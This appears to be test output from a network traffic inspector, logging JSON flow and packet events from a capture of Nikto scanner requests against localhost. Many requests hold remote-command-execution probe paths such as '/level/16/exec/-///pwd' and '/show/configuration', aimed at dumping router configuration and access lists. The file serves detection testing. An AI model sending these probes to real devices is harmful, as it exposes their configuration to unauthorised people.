01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="}
01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"}
01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="}
01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
